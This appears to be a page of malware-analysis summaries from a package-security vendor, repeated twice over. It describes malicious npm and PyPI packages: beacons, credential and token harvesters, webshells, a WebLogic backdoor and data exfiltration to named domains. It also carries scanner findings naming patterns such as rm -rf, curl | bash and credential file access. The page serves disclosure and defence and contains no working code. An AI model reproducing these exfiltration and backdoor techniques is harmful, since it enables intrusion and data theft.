Secure your dependencies. Ship with confidence.

This module functions as a persistent network beacon that collects public IP and geolocation metadata, tags it with a hardcoded API key and a function label, and repeatedly transmits the data in cleartext to an obscure remote endpoint. It contains multiple indicators of malicious or privacy-invasive behavior: hardcoded credentials, plaintext exfiltration to an unknown domain, infinite looping with silent exception handling, and no user consent or safeguards. Treat as high risk: do not run in production or on sensitive hosts. If found in a codebase or installed package, isolate the host, investigate outbound connections to uif01.xyz and ip-api.com calls, and remove or replace the component. Further investigation of the remote domain and the API key owner is recommended.

This code is not typical benign utility code; it is an intentionally obfuscated fingerprinting and request-sign generation library. It collects broad device/browser signals (including local IPs via WebRTC, canvas/WebGL fingerprints, plugins, fonts, cookies, battery, event timing) and encodes them into a signed token (X-Bogus) and/or appends them to report URLs. It does not spawn system shells or run arbitrary OS commands, but it is privacy-invasive and designed to track or strongly identify clients and to support anti-bot measures — potentially undesirable in many contexts. Use of this module should be considered a privacy and tracking risk; evaluate legal/privacy implications before using. If your threat model treats fingerprinting as malicious, avoid using this package or audit it thoroughly and disclose to users.

This code is a high-risk credential-harvesting and persistence tool. It can automatically extract a Discord user token from the Discord login web app using browser automation and in-page evaluation, then writes that token in plaintext into local MCP configuration files (and backups) as DISCORD_TOKEN so a downstream command can reuse it. This behavior is consistent with malicious “selfbot” enablement and unauthorized Discord automation; it should be treated as malware-level risk in supply-chain contexts. Users should assume the token could already be compromised and should revoke/rotate any Discord tokens used with it and audit written config locations.

The code presents significant security risks, particularly through remote command execution and file operations. The potential for exploitation is high due to the lack of input validation and the use of sensitive credentials. Proper security measures should be implemented to mitigate these risks.

Live on pypi for 23 minutes before removal. Socket users were protected even while the package was live.

This class is a malicious webshell/memshell implementation. It listens for a hidden HTTP header trigger and then interprets specially encoded request bodies to create, manage and use persistent in-memory tunnels and HTTP redirects/proxies to arbitrary target hosts. It disables SSL verification for proxied HTTPS connections, spawns background threads, and persists tunnel state in a static Hashtable. This functionality allows remote attackers to create covert bidirectional tunnels and exfiltrate or relay data over HTTP(s), and is a high risk supply-chain/backdoor artifact. Remove and treat as compromise.

[Skill Scanner] Installation of third-party script detected All findings: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] This devcontainer skill is functionally coherent and aligned with its stated purpose: setting up a privileged development container environment for Python with uv and optional Docker-in-Docker. It does not contain hidden obfuscation or explicit malicious code. However it documents several high-risk, by-design practices: mounting the host SSH directory, exposing the Docker socket, and creating a NOPASSWD sudo user. Those features are acceptable for trusted local development but are dangerous if used in untrusted environments or with unreviewed repositories because they allow privilege escalation and potential access to host secrets. The pull from ghcr.io using the 'latest' tag is a minor supply-chain risk unless pinned. Recommend restricting these features for trusted contexts, pinning external artifacts, and avoiding NOPASSWD sudo where not necessary. LLM verification: The code fragment presents a legitimate DevContainer-based development workflow with standard best practices (multi-stage builds, non-root user, Python tooling) and acceptable trade-offs for development environments. Key risk areas are Docker-in-Docker usage and NOPASSWD sudo privileges within the container; these should be restricted to trusted, isolated contexts and clearly documented as development-only. No active malicious behavior is evident in the fragment itself, but ongoing vigilance is

The file does not contain readable source code; it appears to be a binary payload. This is a classic sign of malware embedded in a software package. The package should be considered malicious and extremely dangerous. Do not use.

This Go source contains routines that speak the T3 protocol to connect to Oracle WebLogic servers and deploy a serialized-Java RMI backdoor. It checks for the presence of a class named “com.supeream.payload,” installs a malicious payload if absent, then invokes arbitrary OS commands on the target and can clean up the backdoor afterward. Payload templates reference a default endpoint t3://47[.]104[.]229[.]232:7001, which is dynamically replaced with the victim IP/port. The hex-encoded Java object streams hide the backdoor installer/uninstaller and command execution logic, representing a high-severity malware threat.

The script seems to be part of a spamming operation and uses bad security practices, such as hardcoding paths and credentials. Therefore, it's a potential security risk.

Live on npm for 17 hours and 22 minutes before removal. Socket users were protected even while the package was live.

The code is obfuscated, which is often used to hide malicious intent, but without further context or decoding, it's impossible to definitively assess its purpose or risk. The reports are invalid and provide no insight. Further analysis is required to decode and understand the string.

The code contains potential security risks such as hard-coded file paths, subprocess.Popen usage, and the handling of untrusted data through PyArrow Plasma. It is essential to review and address these security concerns before using this code in a production environment.

Conclusion: The Merconis InstallerController exhibits high-risk characteristics due to the presence of an obfuscated eval payload that could execute arbitrary code, combined with remote content downloads and reconstructive file operations during installation. While some safeguards exist (MD5 hash checks, prepared statements in many paths), the obfuscated runtime code execution and reliance on external data/resources create substantial supply-chain and remote-code-execution risks. A secure review should decode the eval payload, verify its purpose, ensure all downloads are strictly authenticated and delivered over TLS with integrity checks, and replace any dynamic code execution and untrusted deserialization with safe, auditable alternatives.

This module contains multiple high-risk behaviors consistent with tools intended to evade detection and modify system identity and state: changing MachineGuid/ProductId, modifying Office security and MRU entries, masking virtualization indicators, attempting system-level execution via psexec, and adding persistent routes. While not showing explicit data exfiltration or a remote backdoor in this fragment, the operations are commonly used by malware for persistence, anti-analysis, and anti-forensics. Treat this package as malicious or highly dangerous unless you have a verified, legitimate, documented use-case and strict controls.

This code collects system-identifying data (username, hostname, file path), hex-encodes it, constructs a domain under a hardcoded external base ('furb.pw') embedding that data into subdomain labels, and issues an HTTPS GET to that domain — a clear data-exfiltration pattern. The behavior is malicious or at minimum privacy-invasive telemetry sent to an external third party. The package should not be trusted or used without removal of the network exfiltration logic and a full audit.

This module is a high-risk runtime packer/dropper: it embeds an encrypted payload, decrypts it using a user-supplied passphrase, writes the result to `bin/do-setup-circleci-secrets`, and immediately executes it. Because there is no integrity/authenticity validation of the decrypted artifact and the executed code is not shown here, the module should be treated as potentially malicious until the decrypted `bin/do-setup-circleci-secrets` content is inspected and validated in a safe environment.

The analyzed skill is coherent with an end-to-end Claude Code automation framework, including isolation, logging, and PR lifecycle management. Security concerns center on permission-bypass capabilities, autonomous long-running execution, and access to logs/registries that may reveal prompts or intents. Governance controls, least-privilege prompts, strict access controls for logs/registries, and per-action approvals are recommended to mitigate risk. Overall, the design is powerful but requires careful sandboxing and operational governance.

This JSON is an explicit, weaponized catalog of HTTP request smuggling payloads and evasion techniques. It is high-risk: the payloads enable request smuggling, response queue poisoning, session/token capture, reflected XSS, and open-redirect attacks when sent to vulnerable HTTP stacks. The file is data-only (no active code), but its distribution or inclusion in broadly-available packages/tooling without strict access controls or clear authorization guidance poses a substantial security risk. Treat as offensive test material — permit only in controlled, authorized security-testing contexts and avoid bundling into production dependencies or public libraries.

This workflow is intentionally insecure and contains many clear supply-chain and CI/CD attack vectors: command injection (eval/exec/Invoke-Expression/pipe-to-bash), remote script execution (curl | bash), use of untrusted/typosquatted/unpinned actions, secrets passed to untrusted actions or printed, cross-repo access with tokens, and risky self-hosted privileged operations. It should not be used as-is in production. Mitigations include: never execute untrusted event data, avoid pull_request_target for running untrusted code, pin and verify actions, do not pass secrets to third-party or unverified actions, avoid curl|bash and running untrusted docker images privileged, and restrict self-hosted runners. Treat this workflow as malicious/insecure.

This install script performs active data exfiltration and network beaconing to an external domain, leaking local user and environment information. This behavior is malicious or at minimum highly suspicious telemetry/privacy-invasive activity and could be used for tracking, reconnaissance, or as part of a command-and-control mechanism. It should be treated as malware and blocked unless you fully trust and control the receiving domain and purpose.

The code may be used for malicious purposes. It collects sensitive information (environment variables) and sends them to a potentially dangerous host. This could lead to sensitive data leakage.

Live on npm for 1 hour and 23 minutes before removal. Socket users were protected even while the package was live.

This module zips a local directory and uploads it to a specific S3 bucket. The code contains hardcoded AWS credentials and a hardcoded bucket name, which is a severe security issue and could enable data exfiltration if these credentials are valid. There are additional problems: a likely return-value bug (undefined variable s3_ke), possible insufficient path-safety around symlinks, and verbose logging of paths. There is no evidence of obfuscation or active payloads like reverse shells or eval-based code execution. Treat this package as high-risk until credentials are removed/rotated and the code is corrected and reviewed.

Live on pypi for 5 days, 5 hours and 56 minutes before removal. Socket users were protected even while the package was live.

This module is an active XXE exploitation tool designed to read local files from a target XML parser and to exfiltrate data via an out-of-band HTTP callback to a hardcoded attacker-controlled domain. It is offensive in nature and poses a high security risk if used without authorization. Use only in authorized penetration tests with explicit permission; otherwise treat the tool as malicious. Remediation for targets: disable external entity resolution, use secure XML parsers that disallow DTDs/entities, apply input validation, and block outbound HTTP to untrusted destinations.

Live on pypi for 14 days, 18 hours and 42 minutes before removal. Socket users were protected even while the package was live.

The script collects environment variables, hostname, package name, and network interface information, and sends it to a remote server. Although the comment claims no harmful code is executed, this can still lead to information leakage.

Live on npm for 2 minutes before removal. Socket users were protected even while the package was live.

This file collects system details (such as hostname, user account, platform, and domain information) and transmits them to the remote domain bugbounty[.]click. It disables TLS certificate validation (NODE_TLS_REJECT_UNAUTHORIZED=0), enabling potential man-in-the-middle attacks. This behavior equates to data exfiltration and represents a severe security risk.

This module functions as a persistent network beacon that collects public IP and geolocation metadata, tags it with a hardcoded API key and a function label, and repeatedly transmits the data in cleartext to an obscure remote endpoint. It contains multiple indicators of malicious or privacy-invasive behavior: hardcoded credentials, plaintext exfiltration to an unknown domain, infinite looping with silent exception handling, and no user consent or safeguards. Treat as high risk: do not run in production or on sensitive hosts. If found in a codebase or installed package, isolate the host, investigate outbound connections to uif01.xyz and ip-api.com calls, and remove or replace the component. Further investigation of the remote domain and the API key owner is recommended.

This code is not typical benign utility code; it is an intentionally obfuscated fingerprinting and request-sign generation library. It collects broad device/browser signals (including local IPs via WebRTC, canvas/WebGL fingerprints, plugins, fonts, cookies, battery, event timing) and encodes them into a signed token (X-Bogus) and/or appends them to report URLs. It does not spawn system shells or run arbitrary OS commands, but it is privacy-invasive and designed to track or strongly identify clients and to support anti-bot measures — potentially undesirable in many contexts. Use of this module should be considered a privacy and tracking risk; evaluate legal/privacy implications before using. If your threat model treats fingerprinting as malicious, avoid using this package or audit it thoroughly and disclose to users.

This code is a high-risk credential-harvesting and persistence tool. It can automatically extract a Discord user token from the Discord login web app using browser automation and in-page evaluation, then writes that token in plaintext into local MCP configuration files (and backups) as DISCORD_TOKEN so a downstream command can reuse it. This behavior is consistent with malicious “selfbot” enablement and unauthorized Discord automation; it should be treated as malware-level risk in supply-chain contexts. Users should assume the token could already be compromised and should revoke/rotate any Discord tokens used with it and audit written config locations.

The code presents significant security risks, particularly through remote command execution and file operations. The potential for exploitation is high due to the lack of input validation and the use of sensitive credentials. Proper security measures should be implemented to mitigate these risks.

Live on pypi for 23 minutes before removal. Socket users were protected even while the package was live.

This class is a malicious webshell/memshell implementation. It listens for a hidden HTTP header trigger and then interprets specially encoded request bodies to create, manage and use persistent in-memory tunnels and HTTP redirects/proxies to arbitrary target hosts. It disables SSL verification for proxied HTTPS connections, spawns background threads, and persists tunnel state in a static Hashtable. This functionality allows remote attackers to create covert bidirectional tunnels and exfiltrate or relay data over HTTP(s), and is a high risk supply-chain/backdoor artifact. Remove and treat as compromise.

[Skill Scanner] Installation of third-party script detected All findings: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] This devcontainer skill is functionally coherent and aligned with its stated purpose: setting up a privileged development container environment for Python with uv and optional Docker-in-Docker. It does not contain hidden obfuscation or explicit malicious code. However it documents several high-risk, by-design practices: mounting the host SSH directory, exposing the Docker socket, and creating a NOPASSWD sudo user. Those features are acceptable for trusted local development but are dangerous if used in untrusted environments or with unreviewed repositories because they allow privilege escalation and potential access to host secrets. The pull from ghcr.io using the 'latest' tag is a minor supply-chain risk unless pinned. Recommend restricting these features for trusted contexts, pinning external artifacts, and avoiding NOPASSWD sudo where not necessary. LLM verification: The code fragment presents a legitimate DevContainer-based development workflow with standard best practices (multi-stage builds, non-root user, Python tooling) and acceptable trade-offs for development environments. Key risk areas are Docker-in-Docker usage and NOPASSWD sudo privileges within the container; these should be restricted to trusted, isolated contexts and clearly documented as development-only. No active malicious behavior is evident in the fragment itself, but ongoing vigilance is

The file does not contain readable source code; it appears to be a binary payload. This is a classic sign of malware embedded in a software package. The package should be considered malicious and extremely dangerous. Do not use.

This Go source contains routines that speak the T3 protocol to connect to Oracle WebLogic servers and deploy a serialized-Java RMI backdoor. It checks for the presence of a class named “com.supeream.payload,” installs a malicious payload if absent, then invokes arbitrary OS commands on the target and can clean up the backdoor afterward. Payload templates reference a default endpoint t3://47[.]104[.]229[.]232:7001, which is dynamically replaced with the victim IP/port. The hex-encoded Java object streams hide the backdoor installer/uninstaller and command execution logic, representing a high-severity malware threat.

The script seems to be part of a spamming operation and uses bad security practices, such as hardcoding paths and credentials. Therefore, it's a potential security risk.

Live on npm for 17 hours and 22 minutes before removal. Socket users were protected even while the package was live.

The code is obfuscated, which is often used to hide malicious intent, but without further context or decoding, it's impossible to definitively assess its purpose or risk. The reports are invalid and provide no insight. Further analysis is required to decode and understand the string.

The code contains potential security risks such as hard-coded file paths, subprocess.Popen usage, and the handling of untrusted data through PyArrow Plasma. It is essential to review and address these security concerns before using this code in a production environment.

Conclusion: The Merconis InstallerController exhibits high-risk characteristics due to the presence of an obfuscated eval payload that could execute arbitrary code, combined with remote content downloads and reconstructive file operations during installation. While some safeguards exist (MD5 hash checks, prepared statements in many paths), the obfuscated runtime code execution and reliance on external data/resources create substantial supply-chain and remote-code-execution risks. A secure review should decode the eval payload, verify its purpose, ensure all downloads are strictly authenticated and delivered over TLS with integrity checks, and replace any dynamic code execution and untrusted deserialization with safe, auditable alternatives.

This module contains multiple high-risk behaviors consistent with tools intended to evade detection and modify system identity and state: changing MachineGuid/ProductId, modifying Office security and MRU entries, masking virtualization indicators, attempting system-level execution via psexec, and adding persistent routes. While not showing explicit data exfiltration or a remote backdoor in this fragment, the operations are commonly used by malware for persistence, anti-analysis, and anti-forensics. Treat this package as malicious or highly dangerous unless you have a verified, legitimate, documented use-case and strict controls.

This code collects system-identifying data (username, hostname, file path), hex-encodes it, constructs a domain under a hardcoded external base ('furb.pw') embedding that data into subdomain labels, and issues an HTTPS GET to that domain — a clear data-exfiltration pattern. The behavior is malicious or at minimum privacy-invasive telemetry sent to an external third party. The package should not be trusted or used without removal of the network exfiltration logic and a full audit.

This module is a high-risk runtime packer/dropper: it embeds an encrypted payload, decrypts it using a user-supplied passphrase, writes the result to `bin/do-setup-circleci-secrets`, and immediately executes it. Because there is no integrity/authenticity validation of the decrypted artifact and the executed code is not shown here, the module should be treated as potentially malicious until the decrypted `bin/do-setup-circleci-secrets` content is inspected and validated in a safe environment.

The analyzed skill is coherent with an end-to-end Claude Code automation framework, including isolation, logging, and PR lifecycle management. Security concerns center on permission-bypass capabilities, autonomous long-running execution, and access to logs/registries that may reveal prompts or intents. Governance controls, least-privilege prompts, strict access controls for logs/registries, and per-action approvals are recommended to mitigate risk. Overall, the design is powerful but requires careful sandboxing and operational governance.

This JSON is an explicit, weaponized catalog of HTTP request smuggling payloads and evasion techniques. It is high-risk: the payloads enable request smuggling, response queue poisoning, session/token capture, reflected XSS, and open-redirect attacks when sent to vulnerable HTTP stacks. The file is data-only (no active code), but its distribution or inclusion in broadly-available packages/tooling without strict access controls or clear authorization guidance poses a substantial security risk. Treat as offensive test material — permit only in controlled, authorized security-testing contexts and avoid bundling into production dependencies or public libraries.

This workflow is intentionally insecure and contains many clear supply-chain and CI/CD attack vectors: command injection (eval/exec/Invoke-Expression/pipe-to-bash), remote script execution (curl | bash), use of untrusted/typosquatted/unpinned actions, secrets passed to untrusted actions or printed, cross-repo access with tokens, and risky self-hosted privileged operations. It should not be used as-is in production. Mitigations include: never execute untrusted event data, avoid pull_request_target for running untrusted code, pin and verify actions, do not pass secrets to third-party or unverified actions, avoid curl|bash and running untrusted docker images privileged, and restrict self-hosted runners. Treat this workflow as malicious/insecure.

This install script performs active data exfiltration and network beaconing to an external domain, leaking local user and environment information. This behavior is malicious or at minimum highly suspicious telemetry/privacy-invasive activity and could be used for tracking, reconnaissance, or as part of a command-and-control mechanism. It should be treated as malware and blocked unless you fully trust and control the receiving domain and purpose.

The code may be used for malicious purposes. It collects sensitive information (environment variables) and sends them to a potentially dangerous host. This could lead to sensitive data leakage.

Live on npm for 1 hour and 23 minutes before removal. Socket users were protected even while the package was live.

This module zips a local directory and uploads it to a specific S3 bucket. The code contains hardcoded AWS credentials and a hardcoded bucket name, which is a severe security issue and could enable data exfiltration if these credentials are valid. There are additional problems: a likely return-value bug (undefined variable s3_ke), possible insufficient path-safety around symlinks, and verbose logging of paths. There is no evidence of obfuscation or active payloads like reverse shells or eval-based code execution. Treat this package as high-risk until credentials are removed/rotated and the code is corrected and reviewed.

Live on pypi for 5 days, 5 hours and 56 minutes before removal. Socket users were protected even while the package was live.

This module is an active XXE exploitation tool designed to read local files from a target XML parser and to exfiltrate data via an out-of-band HTTP callback to a hardcoded attacker-controlled domain. It is offensive in nature and poses a high security risk if used without authorization. Use only in authorized penetration tests with explicit permission; otherwise treat the tool as malicious. Remediation for targets: disable external entity resolution, use secure XML parsers that disallow DTDs/entities, apply input validation, and block outbound HTTP to untrusted destinations.

Live on pypi for 14 days, 18 hours and 42 minutes before removal. Socket users were protected even while the package was live.

The script collects environment variables, hostname, package name, and network interface information, and sends it to a remote server. Although the comment claims no harmful code is executed, this can still lead to information leakage.

Live on npm for 2 minutes before removal. Socket users were protected even while the package was live.

This file collects system details (such as hostname, user account, platform, and domain information) and transmits them to the remote domain bugbounty[.]click. It disables TLS certificate validation (NODE_TLS_REJECT_UNAUTHORIZED=0), enabling potential man-in-the-middle attacks. This behavior equates to data exfiltration and represents a severe security risk.